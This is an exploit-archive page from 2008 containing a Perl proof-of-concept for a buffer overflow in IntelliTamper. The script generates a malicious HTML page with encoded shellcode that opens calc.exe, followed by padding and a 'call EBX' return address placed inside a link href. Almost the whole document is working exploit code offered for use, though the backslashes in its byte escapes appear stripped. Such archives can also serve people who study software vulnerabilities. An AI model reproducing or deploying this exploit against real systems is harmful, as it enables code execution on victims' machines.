Home / exploits intellitamper-overflow.txt
Posted on 22 July 2008
#!/usr/bin/perl # use warnings; use strict; # CMD="c:windowssystem32calc.exe" # [*] x86/alpha_mixed succeeded, final size 344 my $shellcode = "xdaxc3xd9x74x24xf4x5ax4ax4ax4ax4ax4ax4ax4ax4a" . "x4ax4ax43x43x43x43x43x43x43x37x52x59x6ax41x58" . "x50x30x41x30x41x6bx41x41x51x32x41x42x32x42x42" . "x30x42x42x41x42x58x50x38x41x42x75x4ax49x4bx4c" . "x4dx38x47x34x45x50x43x30x43x30x4cx4bx51x55x47" . "x4cx4cx4bx43x4cx44x45x42x58x45x51x4ax4fx4cx4b" . "x50x4fx45x48x4cx4bx51x4fx51x30x45x51x4ax4bx50" . "x49x4cx4bx47x44x4cx4bx45x51x4ax4ex46x51x49x50" . "x4dx49x4ex4cx4bx34x49x50x43x44x43x37x49x51x49" . "x5ax44x4dx45x51x49x52x4ax4bx4cx34x47x4bx51x44" . "x47x54x45x54x43x45x4dx35x4cx4bx51x4fx47x54x45" . "x51x4ax4bx43x56x4cx4bx44x4cx50x4bx4cx4bx51x4f" . "x45x4cx45x51x4ax4bx4cx4bx45x4cx4cx4bx43x31x4a" . "x4bx4cx49x51x4cx51x34x43x34x48x43x51x4fx50x31" . "x4cx36x45x30x51x46x42x44x4cx4bx51x56x46x50x4c" . "x4bx47x30x44x4cx4cx4bx42x50x45x4cx4ex4dx4cx4b" . "x45x38x43x38x4bx39x4cx38x4cx43x49x50x43x5ax50" . "x50x43x58x4ax50x4dx5ax45x54x51x4fx42x48x4cx58" . "x4bx4ex4dx5ax44x4ex46x37x4bx4fx4ax47x42x43x46" . "x5ax51x4cx42x57x42x49x42x4ex42x44x42x4fx42x57" . "x43x43x51x4cx43x43x44x39x43x43x43x44x43x55x42" . "x4dx47x43x50x32x51x4cx43x53x45x31x42x4cx42x43" . "x46x4ex45x35x44x38x42x45x43x30x45x5ax41x41"; my $evil_html = '<html><head><title>ph33r</title></head><body>' . #'<a href="http://AAAAAAAAAA' . #"x41" x 450 . '<a href="http://' . $shellcode . "x41" x 116 . "x39x5cx3dx7e" . # ascii friendly 'call EBX' '.htm">ph33r</a>' . "</body></html>"; print $evil_html;
